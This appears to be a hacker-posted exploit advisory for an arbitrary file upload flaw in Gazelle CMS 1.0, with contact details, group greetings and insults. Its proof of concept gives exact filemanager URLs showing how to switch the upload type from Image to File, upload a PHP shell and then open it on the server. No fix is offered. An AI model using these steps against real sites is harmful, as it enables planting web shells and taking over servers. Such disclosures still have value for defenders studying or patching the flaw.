Gazelle CMS version 1.0 suffers from a remote arbitrary shell upload vulnerability.
2b24d2a600694781c22d3f4ae5229fb863f075be76e2d91d09a0580ac4e8400d
====================================================
| Gazelle CMS 1.0 Remote Arbitrary File Upload Vuln
| My Home Page : WwW.Sec-Code.CoM
| Founded By RoMaNcYxHaCkEr
====================================================
[!] Discovered.: RoMaNcYxHaCkEr
[!] Vendor.....: http://www.anantasoft.com/index.php?Gazelle%20CMS/Download
[!] My Homepage...: WwW.Sec-Code.CoM
[!] Security - Codes Group ...: aB0-3tH4b T3rR0r , mr-al7rbi , sniper-code
[!] Contact Me ...: rXh@Mail.Net.Sa
[!] PoC........:
http://localhost/Ananta_Gazelle1.0/admin/editor/filemanager/browser.html?Connector=connectors/php/connector.php&Type=Image
^^^^
This Is Default In Editor admin
Try Change Image To File Like This :
http://localhost/Ananta_Gazelle1.0/admin/editor/filemanager/browser.html?Connector=connectors/php/connector.php&Type=File
Upload Any Shell.php Then You See That,s Here E.G. :
http://localhost/Ananta_Gazelle1.0/user/File/shell.php
[!] Solution...: I Don,t Know He He :D , Contact With Me ;)
[!] Greetingz..: All My Forum Members , My TeaM , Dexter Franklin ;)
[!] Thx .. : طالب متحمس , IHTTeam For His Exploit
[!] Fuck To .. : Third , Dev1l-Fucker <<< They Big Big Big Big Lamerz
[!] rXh
[!] bEST wISHES